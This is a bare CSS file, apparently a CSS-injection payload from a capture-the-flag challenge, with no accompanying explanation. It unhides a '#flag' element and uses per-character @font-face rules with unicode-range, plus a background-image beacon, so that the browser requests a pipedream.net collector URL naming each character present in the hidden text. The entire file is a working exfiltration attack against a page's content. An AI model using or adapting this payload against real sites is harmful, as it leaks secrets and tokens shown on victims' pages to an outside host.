body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W45')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w45,p98w45,p106w45,p112w45,p115w45,p121w45,p122w45,p48w45,p49w45,p52w45,p53w45,p55w45,p125w45,monospace;width:45ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W45');unicode-range:U+0061}
@font-face{font-family:p98w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W45');unicode-range:U+0062}
@font-face{font-family:p106w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W45');unicode-range:U+006A}
@font-face{font-family:p112w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W45');unicode-range:U+0070}
@font-face{font-family:p115w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W45');unicode-range:U+0073}
@font-face{font-family:p121w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W45');unicode-range:U+0079}
@font-face{font-family:p122w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W45');unicode-range:U+007A}
@font-face{font-family:p48w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W45');unicode-range:U+0030}
@font-face{font-family:p49w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W45');unicode-range:U+0031}
@font-face{font-family:p52w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W45');unicode-range:U+0034}
@font-face{font-family:p53w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W45');unicode-range:U+0035}
@font-face{font-family:p55w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W45');unicode-range:U+0037}
@font-face{font-family:p125w45;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W45');unicode-range:U+007D}